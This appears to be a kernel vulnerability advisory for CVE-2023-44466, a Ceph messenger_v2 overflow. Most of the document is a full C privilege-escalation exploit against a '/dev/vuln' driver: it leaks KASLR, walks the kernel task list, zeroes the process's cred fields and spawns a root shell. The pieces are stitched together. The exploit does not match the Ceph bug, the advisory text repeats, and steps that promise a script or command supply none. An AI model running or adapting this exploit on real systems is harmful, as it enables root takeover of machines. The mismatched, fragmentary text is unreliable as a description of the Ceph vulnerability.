The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that triggers a buffer overflow in the kernel: a user-controlled length is read from a TCP packet (ceph_decode_32(&p) in the link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast to an integer (fd_lens has type int), which can produce a negative value that passes the validity checks on fd_lens.
Moderate - An attacker being able to identify the IP of a device reading the ceph file system can result in a denial of service and remote code execution in the kernel.
and then running this command within the VM with the address of the device running the python script
will result in a KASAN dump.
#define _GNU_SOURCE /* Bring REG_XXX names from /usr/include/sys/ucontext.h */
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include "leak.h"
/* Path of the character device that main() opens read/write. */
#define DRV_PATH "/dev/vuln"
/* ioctl command used by alloc_overflow() when its `overflow` flag is non-zero. */
#define PWN_GET 28673
/* File opened read-only by alloc_plm() and read back by arb_read(). */
#define SE_PATH "/sys/fs/selinux/policy"
/* Process name set with PR_SET_NAME and searched for while walking the task list in main(). */
#define TASK_NAME "th3lsh3ll"
/*
 * Offsets that main() adds to a task address to reach the next-task link,
 * the task name and the cred pointer respectively.
 * NOTE(review): presumably task_struct field offsets for one specific kernel
 * build -- confirm against the target kernel.
 */
#define TASK_OFFSET 1112
#define NAME_OFFSET 1848
#define CRED_OFFSET 1824
/* Number of bytes read from the cred pointer and hex-dumped in main(). */
#define CRED_SIZE 176
/* Not referenced anywhere in the visible source. */
#define MMAP_ADDR 0xdead1000
/*
 * Request buffer handed to the driver's ioctl by alloc()/alloc_overflow().
 * NOTE(review): the driver-side layout is not visible in this file; the field
 * notes below only describe how this file fills them -- confirm against the driver.
 */
struct in {
int fd_len; /* main() sets 16 for the `good` request and -20 for `kleak` */
int pad;
unsigned long actual[2];
unsigned long size; /* arb_read() stores the number of bytes to read back here */
unsigned long addr; /* arb_read() stores the address to read from here */
unsigned long in_buf[8];
};
void* page;
struct in_write {
int fd_len;
int pad;
unsigned long actual[2];
unsigned long next_alloc[2];
unsigned long in_buf[8];
};
int drv_fd = 0;
int se_fd = 0;
/*
 * Print a diagnostic to stderr saying the driver descriptor is unusable.
 * The message is prefixed with the text for the current errno and ends with
 * the current value of drv_fd.
 */
void bad_fd() {
    const char *reason = strerror(errno);

    fprintf(stderr, "%s invalid driver fd %d\n", reason, drv_fd);
}
/* Benign request (fd_len = 16), allocated in main() and used by alloc()/alloc_overflow(good, 0). */
struct in* good = NULL;
/* Request with fd_len = -20 whose addr/size fields arb_read() rewrites before each read. */
struct in* kleak = NULL;
/* Request with fd_len = -20 used by main() for the write phase. */
struct in_write* kw = NULL;
/* Result of kaslr_leak(): leaked pointer minus the fixed reference value. */
unsigned long kaslr_offset = 0;
/* Not referenced anywhere in the visible source. */
unsigned long kmalloc8 = 0;
/*
 * Issue a zero-length read() on the driver descriptor.
 * NOTE(review): going by the function name the driver presumably releases its
 * allocations on read() -- confirm against the driver source.
 * When drv_fd is still 0 nothing is sent and bad_fd() reports the problem.
 */
void free_all() {
    if(!drv_fd) {
        bad_fd();
        return;
    }
    read(drv_fd, 0, 0);
}
/*
 * Send the benign `good` request to the driver with ioctl command 0.
 * A failing ioctl is only reported on stderr; an unopened descriptor
 * (drv_fd == 0) is reported through bad_fd().
 */
void alloc() {
    if(!drv_fd) {
        bad_fd();
        return;
    }

    int rc = ioctl(drv_fd, 0, good);
    if(rc < 0) {
        fprintf(stderr, "ioctl failed spraying kmalloc16\n");
    }
}
/*
 * Send the request buffer `evil` to the driver.
 *
 * evil:     pointer to the request structure passed as the ioctl argument.
 * overflow: non-zero selects ioctl command PWN_GET, zero selects command 0.
 *
 * A failing ioctl is only reported on stderr; an unopened descriptor
 * (drv_fd == 0) is reported through bad_fd().
 */
void alloc_overflow(void* evil, int overflow) {
    if(!drv_fd) {
        bad_fd();
        return;
    }

    int cmd = 0;
    if(overflow) {
        cmd = PWN_GET;
    }

    if(ioctl(drv_fd, cmd, evil) < 0) {
        fprintf(stderr, "leaking KASLR ioctl failed\n");
    }
}
// before triggering #DB exception make a SIGTRAP handler
/* Labels emitted by the inline assembly in trigger_DB(). */
extern char mayfault_insn_pre[];
extern char mayfault_insn_post[];
/*
 * SIGTRAP handler installed by setup_kaslr_leak().
 *
 * Compares the RIP saved in the signal context with mayfault_insn_post. When
 * they match the handler simply returns. Otherwise it prints both addresses
 * and restores the default SIGTRAP disposition.
 *
 * signum, info: unused.
 * uctx_:        the ucontext_t supplied by the kernel (SA_SIGINFO handler).
 */
void sigtrap_handler(int signum, siginfo_t *info, void *uctx_) {
    (void)signum;
    (void)info;
    ucontext_t *uctx = uctx_;
    unsigned long rip = (unsigned long)uctx->uc_mcontext.gregs[REG_RIP];
    unsigned long expected = (unsigned long)mayfault_insn_post;

    if(rip != expected) {
        /* Report the address the comparison actually uses (the post label). */
        printf("fault at unknown RIP 0x%lx, expected 0x%lx\n", rip, expected);
        if(signal(SIGTRAP, SIG_DFL) == SIG_ERR) {
            fprintf(stderr, "signal failed %s\n", strerror(errno));
        }
    }
}
/*
 * Execute a single `int1` instruction bracketed by the global labels
 * mayfault_insn_pre and mayfault_insn_post. sigtrap_handler() compares the
 * saved RIP against mayfault_insn_post, so a SIGTRAP handler must be installed
 * before this is called (see setup_kaslr_leak()).
 * NOTE(review): the labels are global symbols, so this function must not be
 * inlined or duplicated by the compiler -- confirm build flags.
 */
void trigger_DB() {
asm volatile(
"mayfault_insn_pre:\n\t"
"int1\n"
"mayfault_insn_post:\n\t"
);
}
// tell the scheduler to pin a task to a specific CPU core
/*
 * pid: task to pin, passed straight to sched_setaffinity().
 * cpu: index of the only CPU left set in the affinity mask.
 *
 * A failure is reported on stderr and otherwise ignored.
 */
static void pin_task_to(int pid, int cpu) {
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);

    int rc = sched_setaffinity(pid, sizeof mask, &mask);
    if(rc != 0) {
        fprintf(stderr, "sched_setaffinity %s\n", strerror(errno));
    }
}
/* Pin to `cpu` by calling pin_task_to() with pid 0. */
static void pin_to(int cpu) {
    pin_task_to(0, cpu);
}
/*
 * Open SE_PATH read-only and store the descriptor in se_fd, unless se_fd is
 * already non-zero. An open() failure is reported on stderr; se_fd then holds
 * the negative value returned by open().
 */
void alloc_plm() {
    if(se_fd) {
        return;
    }
    se_fd = open(SE_PATH, O_RDONLY);
    if(se_fd < 0) {
        fprintf(stderr, "open %s failed: %s\n", SE_PATH, strerror(errno));
    }
}
/*
 * Close the SE_PATH descriptor and reset se_fd to its "not open" value (0).
 * The close is skipped when se_fd is not a positive descriptor, so a call
 * made before alloc_plm() (or after a failed open) does not close stdin.
 */
void free_plm() {
    if(se_fd > 0) {
        close(se_fd);
    }
    se_fd = 0;
}
/* Not referenced anywhere in the visible source. */
int plm_hole = 32;
/* Capacity of address[]; PAGE_SIZE is not defined in the visible source (presumably from leak.h). */
#define NUM_PRCTLS PAGE_SIZE
/* Mappings created by alloc_vmans(idx) and released by free_vmans(idx), indexed by idx. */
void * address[NUM_PRCTLS];
/*
 * Set (or, with name == NULL, clear) the anonymous-VMA name of a mapping via
 * prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, ...).
 *
 * addr: start of the mapping.
 * size: length of the range in bytes.
 * name: NUL-terminated name, or NULL.
 *
 * Returns the prctl() result on success. On failure a diagnostic is printed
 * and the process exits with status 1.
 */
int rename_vma(void* addr, unsigned long size, char *name) {
    int res = prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, (unsigned long)addr, size, name);

    if (res < 0) {
        /* Cast so the arguments match the %lx / %lu conversions. */
        fprintf(stderr, "[!] prctl %s 0x%lx %lu\n", strerror(errno), (unsigned long)addr, size);
        exit(1);
    }
    return res;
}
/*
 * Create a 1024-byte private anonymous mapping, remember it in address[idx],
 * and give it an anonymous-VMA name of the form "aaaa<idx+1>".
 *
 * idx: slot in address[]; the caller must keep it below NUM_PRCTLS.
 *
 * Exits with status 1 if the mapping cannot be created; rename_vma() exits in
 * the same way if the name cannot be set.
 */
void alloc_vmans(size_t idx) {
    void *map = mmap(NULL, 1024, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if(map == MAP_FAILED) {
        fprintf(stderr, "[!] mmap %s\n", strerror(errno));
        exit(1);
    }
    address[idx] = map;

    char buf[12];
    memset(buf, 'a', 12);
    char store[8];
    memset(store, 'a', 8);
    /* %zu matches size_t; snprintf always NUL-terminates within store. */
    snprintf(store, 8, "%zu", idx+1);
    /* Bytes 4..11 of buf become the digits, the terminator and padding. */
    memcpy(&buf[4], store, 8);
    rename_vma(address[idx], 1024, buf);
}
/*
 * Undo alloc_vmans(idx): clear the anonymous-VMA name of the mapping stored
 * in address[idx] (name = NULL), then unmap its 1024 bytes.
 */
void free_vmans(size_t idx) {
    void *map = address[idx];

    rename_vma(map, 1024, NULL);
    munmap(map, 1024);
}
/*
 * Read `bytes` bytes through se_fd after programming kleak with the requested
 * address and size and re-sending it to the driver.
 *
 * addr:  value stored in kleak->addr.
 * bytes: value stored in kleak->size and used as the read() length.
 *
 * Returns a heap buffer holding the data (the caller must free() it), or NULL
 * if the allocation or the read() fails. The buffer is allocated with
 * `bytes` elements of sizeof(unsigned long), i.e. larger than `bytes` bytes.
 */
unsigned long* arb_read(unsigned long addr, unsigned long bytes) {
    unsigned long *leak = calloc((size_t)bytes, sizeof(unsigned long));
    if(!leak) {
        fprintf(stderr, "arb_read: calloc failed %s\n", strerror(errno));
        return NULL;
    }

    kleak->addr = addr;
    kleak->size = bytes;
    /* Rewind to offset 0: lseek takes (fd, offset, whence). */
    lseek(se_fd, 0, SEEK_SET);
    free_all();
    alloc_overflow(kleak, 1);

    ssize_t nbytes = read(se_fd, leak, kleak->size);
    if(nbytes < 0) {
        fprintf(stderr, "arb_read: error reading %s\n", strerror(errno));
        free(leak);
        return NULL;
    }
    return leak;
}
/*
 * Preparation step run first in main(): pin to CPU 0, install
 * sigtrap_handler for SIGTRAP (SA_SIGINFO), then call trigger_DB().
 * A sigaction() failure is reported on stderr but does not stop the sequence.
 */
void setup_kaslr_leak() {
    // pin to cpu and set SIGTRAP handler so we can trigger DB exception
    pin_to(0);

    struct sigaction act = {0};
    act.sa_sigaction = sigtrap_handler;
    act.sa_flags = SA_SIGINFO;

    int rc = sigaction(SIGTRAP, &act, NULL);
    if(rc < 0) {
        fprintf(stderr, "sigaction failed %d %s\n", rc, strerror(errno));
    }

    // raise the exception; the handler above absorbs the resulting SIGTRAP
    trigger_DB();
}
/*
 * Read two pages starting at 0xfffffe000000f000 through arb_read(), take the
 * 8-byte value at offset 0x1f48, and store (value - 0xffffffff81e0124d) in
 * kaslr_offset.
 *
 * Returns the new kaslr_offset. If arb_read() fails, a diagnostic is printed
 * and kaslr_offset is set to 0. If the leaked value looks implausible (first
 * byte zero, or below the reference value), a diagnostic is printed but the
 * subtraction is still performed, as before.
 */
unsigned long kaslr_leak() {
    char *ans = (char*)arb_read(0xfffffe000000f000, PAGE_SIZE*2);
    if(!ans) {
        fprintf(stderr, "[!] either leak failed or KASLR disabled\n");
        kaslr_offset = 0;
        return kaslr_offset;
    }

    // calculate KASLR offset
    char *first_leak = ans+0x1f48;
    unsigned long kptr;
    memcpy(&kptr, first_leak, sizeof kptr);
    if(!*first_leak || kptr < 0xffffffff81e0124d) {
        fprintf(stderr, "[!] either leak failed or KASLR disabled\n");
    }
    kaslr_offset = kptr - 0xffffffff81e0124d;

    free(ans);
    return kaslr_offset;
}
/*
 * Create 256 named mappings with alloc_vmans() (slots 0..255) and then
 * release all of them again with free_vmans(), in ascending slot order.
 */
void warm_heap() {
    const size_t rounds = 256;
    size_t slot;

    puts("[*] warming heap");

    slot = 0;
    while(slot < rounds) {
        alloc_vmans(slot);
        slot++;
    }

    slot = 0;
    while(slot < rounds) {
        free_vmans(slot);
        slot++;
    }
}
/*
 * Read one 8-byte word at `addr` through arb_read() and release the buffer.
 * Returns 0 and stores the word in *out on success, -1 if arb_read() failed.
 */
static int read_kernel_qword(unsigned long addr, unsigned long *out) {
    unsigned long *buf = arb_read(addr, 8);
    if(!buf) {
        return -1;
    }
    *out = *buf;
    free(buf);
    return 0;
}

/*
 * Program entry point. Sequence, as written in this file:
 *   1. setup_kaslr_leak(), then set the process name to TASK_NAME.
 *   2. Open the driver and allocate the request buffers.
 *   3. Arrange allocations (warm_heap / alloc_vmans / free_vmans), open
 *      SE_PATH, and compute kaslr_offset.
 *   4. Walk the task list from init_task until the entry named TASK_NAME is
 *      found, then read and dump its cred data.
 *   5. Only if step 4 succeeded: run the write phase against the cred address.
 *   6. Spawn a shell if uid and euid are 0, otherwise report failure.
 *   7. Fork; the child sleeps forever so the SE_PATH descriptor stays open.
 *
 * Returns 1 on an early setup failure, 0 otherwise.
 */
int main(int argc, char** argv) {
    (void)argc;
    (void)argv;

    setup_kaslr_leak();
    // set process name so we can find it in task_struct linked list
    if(prctl(PR_SET_NAME, TASK_NAME, 0, 0, 0)) {
        fprintf(stderr, "prctl failed to set process name: %s\n", strerror(errno));
        return 1;
    }
    good = calloc(1, sizeof *good);
    if(!good) {
        fprintf(stderr, "calloc failed: %s\n", strerror(errno));
        return 1;
    }
    good->fd_len = 16;
    // open driver
    drv_fd = open(DRV_PATH, O_RDWR);
    if(drv_fd < 0) {
        fprintf(stderr, "%s driver device not available\n", strerror(errno));
        return 1;
    }
    // allocate both overflowing requests up front, while bailing out is still
    // harmless (nothing has been sent to the driver yet)
    kleak = calloc(1, sizeof *kleak);
    kw = calloc(1, sizeof *kw);
    if(!kleak || !kw) {
        fprintf(stderr, "calloc failed: %s\n", strerror(errno));
        return 1;
    }
    kleak->fd_len = -20;
    kw->fd_len = -20;

    // leaking cred struct for current process task_struct by traversing task list starting
    // from init_task
    unsigned long credptr = 0;
    int found = 0;
    char pname[9];
    pname[8] = 0;
    warm_heap();
    // make the SELinuxfs plm struct adjacent in memory to victim chunk
    // so we can overflow the size and address to copy to userspace
    alloc_vmans(1);
    alloc_vmans(0);
    free_vmans(0);
    alloc_overflow(good, 0);
    free_vmans(1);
    alloc_plm();
    kaslr_offset = kaslr_leak();
    printf("[*] KASLR offset 0x%lx\n", kaslr_offset);
    unsigned long init_task = 0xffffffff828149c0+kaslr_offset;
    unsigned long current = init_task;
    while(1) {
        unsigned long next = 0;
        unsigned long name_word = 0;

        if(read_kernel_qword(current+TASK_OFFSET, &next) < 0) {
            break;
        }
        current = next - TASK_OFFSET;
        if(read_kernel_qword(current + NAME_OFFSET, &name_word) < 0) {
            break;
        }
        // copy instead of storing through a cast pointer; pname[8] stays 0
        memcpy(pname, &name_word, sizeof name_word);
        //printf("process name %s\n", pname);
        if(strchr(pname, '|')) {
            // regular SELinux reads as pipe if overflow fails to happen
            break;
        }
        if(!strncmp(TASK_NAME, pname, 8)) {
            printf("[*] 0x%lx current\n", current);
            if(read_kernel_qword(current+CRED_OFFSET, &credptr) < 0) {
                break;
            }
            unsigned long* cred = arb_read(credptr, CRED_SIZE);
            printf("[*] current->real_cred: 0x%lx\n", credptr);
            if(cred) {
                hex_dump((char*)cred, CRED_SIZE);
                free(cred);
            }
            found = 1;
            break;
        }
        if(init_task == current) {
            puts("failed");
            break;
        }
    }
    if(found) {
        alloc_vmans(0);
        alloc_vmans(1);
        free_vmans(0);
        free_vmans(1);
        // start at fsid since it has 0x0s after it
        // once it gets overwritten with 0 do the next field with the same
        // freelist overwrite
        // key thing to remember is offset is size of heap chunk divided by 2
        // and last_chunk + offset
        kw->next_alloc[1] = credptr+32;
        alloc_overflow(kw, 1);
        for(size_t j=0; j<3; j++) {
            // allocate a chunk at the overwritten address
            // then write all zeroes to it
            alloc_overflow(good, 0);
        }
        // repeat for all the fields in the top of
        // the struct cred
        for(size_t i=0; i<5; i++) {
            warm_heap();
            alloc_vmans(0);
            alloc_vmans(1);
            free_vmans(0);
            free_vmans(1);
            kw->next_alloc[1] -= 8;
            alloc_overflow(kw, 1);
            for(size_t j=0; j<3; j++) {
                alloc_overflow(good, 0);
            }
        }
    } else {
        // never run the write phase with an address that was not actually read
        fprintf(stderr, "[!] task %s not found, skipping write phase\n", TASK_NAME);
    }
    if((getuid() == 0) && (geteuid() == 0)) {
        system("/bin/sh");
    } else {
        puts("[!] nooo failed\n");
    }
    // this tail is reached on the failure path too, so the descriptor is
    // still held in that case
    if (fork()) {
        return 0;
    } else {
        //hold the fd for SELinuxFS file so the overwritten pointer is not freed
        //since this causes a kernel panic
        while(1) { sleep(1000); }
    }
    return 0;
}
Summary
The Ceph filesystem has a Linux kernel module that receives TCP packets from an IP address.
Before any authorization is completed, any device with that IP address can send a packet that triggers a buffer overflow in the kernel: a user-controlled length is read from a TCP packet (ceph_decode_32(&p) in the link): https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L520.
This u32 is cast to an integer (fd_lens has type int), which can produce a negative value that passes the validity checks on fd_lens.
This integer is then used to calculate the size of a buffer here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1698. The attacker can make head_len any value; for an overflow to happen, the attacker can supply a value smaller than the number of bytes that are copied here: https://elixir.bootlin.com/linux/v6.4-rc1/source/net/ceph/messenger_v2.c#L1711. Here con->v2.in_buf is also user-controlled.
Severity
Moderate - An attacker being able to identify the IP of a device reading the ceph file system can result in a denial of service and remote code execution in the kernel.
Proof of Concept
Create a linux kernel qemu VM following these steps: https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md#image
Create 2 other disk images, compile the linux kernel, and then run qemu:
The bigdisk.img should be about 50GB and the other two at least 10GB
Within the qemu VM install ceph using this link https://docs.ceph.com/en/latest/install/index_manual/ or the shell script below:
By executing this script locally to send the packet:
and then running this command within the VM with the address of the device running the python script
mount -t ceph <ip address>:/ /mnt/mycephfs/ -o ms_mode=crc,name=foo
will result in a KASAN dump.
CVE-2023-44466
Timeline
Date reported: 07/05/2023
Date fixed: 07/12/2023
Date disclosed: 08/30/2023